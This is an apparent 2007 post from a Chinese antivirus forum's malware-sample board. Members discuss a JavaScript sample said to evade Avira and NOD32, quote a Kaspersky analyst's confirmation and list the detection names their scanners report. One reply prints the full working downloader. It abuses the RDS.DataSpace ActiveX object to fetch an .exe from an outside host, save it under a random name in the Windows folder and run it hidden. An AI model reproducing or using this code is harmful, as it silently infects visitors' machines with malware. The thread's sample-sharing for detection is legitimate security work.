查看: 4213|回复: 13
收起左侧

[病毒样本] 过AVIRA和nod32

[复制链接]
The EQs
发表于 2007-5-7 09:32:50 | 显示全部楼层 |阅读模式
Hello.
New malicious software was found in the attached file.
It's detection will be included in the next update as Trojan-Downloader.JS.Small.ew. Thank you for your help.
-----------------
Regards, Yury Nesmachny
Virus Analyst, Kaspersky Lab.

Ph.: +7(495) 797-8700
E-mail: newvirus@kaspersky.com
http://www.kaspersky.com   http://www.viruslist.com

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
The EQs
 楼主| 发表于 2007-5-7 09:36:18 | 显示全部楼层
已经上报给AVIRA和eset了。。。。
allenhippo
发表于 2007-5-7 09:44:41 | 显示全部楼层

  1. function gn(n)
  2. {
  3.         var number = Math.random()*n;
  4.         return '~tmp'+Math.round(number)+'.exe';
  5. }
  6. try
  7. {
  8.         dl='http://mail.8u8y.com/ad/pic/...................exe';
  9.         var df=document.createElement("object");
  10.         df.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
  11.         var x=df.CreateObject("Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P","");
  12.         var S=df.CreateObject("Adodb.Stream","");
  13.         S.type=1;
  14.         x.open("GET", dl,0);
  15.         x.send();
  16.         fname1=gn(10000);
  17.         var F=df.CreateObject("Scripting.FileSystemObject","");
  18.         var tmp=F.GetSpecialFolder(0);
  19.         fname1= F.BuildPath(tmp,fname1);
  20.         S.Open();
  21.         S.Write(x.responseBody);
  22.         S.SaveToFile(fname1,2);
  23.         S.Close();
  24.         var Q=df.CreateObject("Shell.Application","");
  25.         Q.ShellExecute(fname1,"","","open",0);
  26. }
  27. catch(i)
  28. {
  29.         i=1;
  30. }
复制代码
The EQs
 楼主| 发表于 2007-5-7 09:46:13 | 显示全部楼层
在网上看到这段代码。。。。然后自己copy一下。。。没想到竟然过了卡巴,nod32和AVIRA
solcroft
发表于 2007-5-7 09:49:37 | 显示全部楼层
代码... 你竟然要杀软杀代码...
先把它compile成exe再来扫吧
可惜我的compiler被电脑管理员卸载了
The EQs
 楼主| 发表于 2007-5-7 09:51:30 | 显示全部楼层
本来想弄成js给卡巴的。。。。。
sdbsky
发表于 2007-5-7 09:52:03 | 显示全部楼层
\virus\鏂板缓_鏂囨湰鏂囨。.rar>>鏂板缓 鏂囨湰鏂
囨。\新建 文本文档.txt

Trojan.DL.JS.Agent.lcd
moonsilver
发表于 2007-5-7 09:59:03 | 显示全部楼层
C:\Documents and Settings\moonsilver\桌面\1.js

Trojan.DL.JS.Agent.f

rising
kfcnknight
发表于 2007-5-7 10:08:28 | 显示全部楼层
Generic.XPL.ADODB.7A6784DE
马力
发表于 2007-5-7 12:02:32 | 显示全部楼层
驱逐舰

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-6 10:17 , Processed in 0.135537 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表